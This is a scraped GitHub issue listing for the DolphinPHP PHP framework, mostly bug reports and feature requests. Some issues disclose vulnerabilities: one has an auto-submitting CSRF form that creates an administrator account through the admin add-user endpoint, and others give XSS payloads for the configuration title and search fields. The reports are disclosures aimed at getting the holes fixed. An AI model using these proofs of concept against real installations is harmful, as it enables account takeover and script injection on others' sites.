caiweiming / dolphinphp Goto Github PK
View Code? Open in Web Editor NEW海豚PHP——基于ThinkPHP5.1.41LTS的快速开发框架
Home Page: http://www.dolphinphp.com
License: Other
海豚PHP——基于ThinkPHP5.1.41LTS的快速开发框架
Home Page: http://www.dolphinphp.com
License: Other
The Add User form without csrf token.
Hacker can use it to add a new user.
Spoofing an administrator to open this page :
<html>
<body>
<form action="http://192.168.52.130/public/admin.php/user/index/add.html" method="POST" id="test">
<input type="hidden" name="username" value="hackertest" />
<input type="hidden" name="nickname" value="hackertest" />
<input type="hidden" name="role" value="1" />
<input type="hidden" name="email" value="qq@aixinwei.wang" />
<input type="hidden" name="password" value="testtest" />
<input type="hidden" name="mobile" value="13311111111" />
<input type="hidden" name="avatar" value="" />
<input type="hidden" name="status" value="1" />
</form>
<script>
var f=document.getElementById("test");
f.submit();
</script>
</body>
</html>
suggestion for repairing:add csrf token to the html form.
加油!!!
如题,在自动添加模式下,我设置的修改器均无效,求修正
这样体验会更好,避免 实时刷新全页面。
官方有升级到thinkphp 6.0的计划吗? 有没有定出时间点来?
/application/user/admin/Index.php 文件
532行 $this->request->post(['ids'=> $user_list]);
报错 Array to string conversion
TP5.1已经不支持数组传参修改请求值了。
Zbuilder挺不错的,可以试下将它开源出去,让更多的人来完善它。
version:1.5.1
Vulnerability location:Background - > System - > system function - > configuration management.
Add a new configuration,and insert payload in the configuration title
payload: t"><img src=x onerror=alert(1)>
Save and refresh the page. Pop up window.
payload: <img src=x onerror=alert("xss")>
When you visit this page, a pop-up window will pop up.
好东西自会有人拥护,不要被别人干扰。
地址:https://www.kancloud.cn/ming5112/dolphinphp/619103
我下载最新版本,设置fixedLeft,添加多列,使用x轴滚动条,没有发现左侧列固定。
一、是否是我理解错了它的用处
二、是否是我的写法有错误
三、使用它有什么注意项
四、是否能写一个完整体现效果的demo
你好,问个zbuild构建table时,在搜索关键字且当前页不为第1页时会搜索不到结果。
例:
使用zbuild构建当前table,翻页到第6页(大于第一页就行),然后,搜索任何一个关键字,会搜索不到,如果将url中的page=xxx改为page=1就可以搜索 到了。
这是一个小bug吧,当进行搜索时,要将当前的page重置为1才能有结果。这个怎样处理???
application/admin/controller/Admin.php 155行
比如商品多级分类列表 添加多级之后 列表里都显示出来了 看不出层级关系
public function setIpAttr(){
return request()->ip();
}
return ZBuilder::make('table')
->addColumns([
['ip','ip地址','callback',function($value){
// 这里的$value 是获取不到值的
return 456;
}],
->fetch();
质量很高! 良心作品
我用的 valet 开发环境,进入后台就一直 302 跳转,表示很无语~
DolphinPHP/application/cms/admin/Document.php
Line 223 in 77dd8ee
现在就一个版本
有的时候 切换显示隐藏并不需要清空隐藏的表单值,
/**
* 设置触发
* @param string $trigger 需要触发的表单项名,目前支持select(单选类型)、text、radio三种
* @param string $values 触发的值
* @param string $show 触发后要显示的表单项名,目前不支持普通联动、范围、拖动排序、静态文本
* @param bool $is_clear 是否清除隐藏表单的值,默认清除
* @author 蔡伟明
* @return $this
*/
public function setTrigger($trigger = '', $values = '', $show = '', $is_clear = true)
创建了视图,会被显示在列表里面。
但备份逻辑应该是只针对table的,若选中视图备份,会失败。
/application/admin/controller/Admin.php
add 方法,password类型保存的时候没有加密,建议加上
foreach ($form['items'] as $item) {
if($item[0]=='password'){
$data[$item[1]]=Hash::make((string)$data[$item[1]]);
}
}
行为这块 默认会在 app_begin 执行 config 会导致动态配置的config 无效.
*情景是这样的 如果我后台开启了水印,但是部分上传不需要水印 我可以动态关闭 upload_thumb_water 但是执行行为以后 每次到attachment 都会重新读取配置 导致 config('upload_thumb_water',0) 无效
当设置缩略图时,并且上传图片过大(测试图片为894K和2.1M),会上传不成功,复现率100%
version:1.5.1
Vulnerability location:Background - > System - > system function - > Attachment management.
Background - > System - > system function - > system log.
Background - > System - > system function - > Behavior management.
Influence parameters:search_field
payload:test"><img src=x onerror=alert("xss")>
version:1.5.1
Vulnerability location:Background - > System - > system function - > configuration management.
Add a new configuration,and insert payload in the configuration title
payload: t">
Save and refresh the page. Pop up window.
payload: <img src=x onerror=alert("xss")>
When you visit this page, a pop-up window will pop up.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.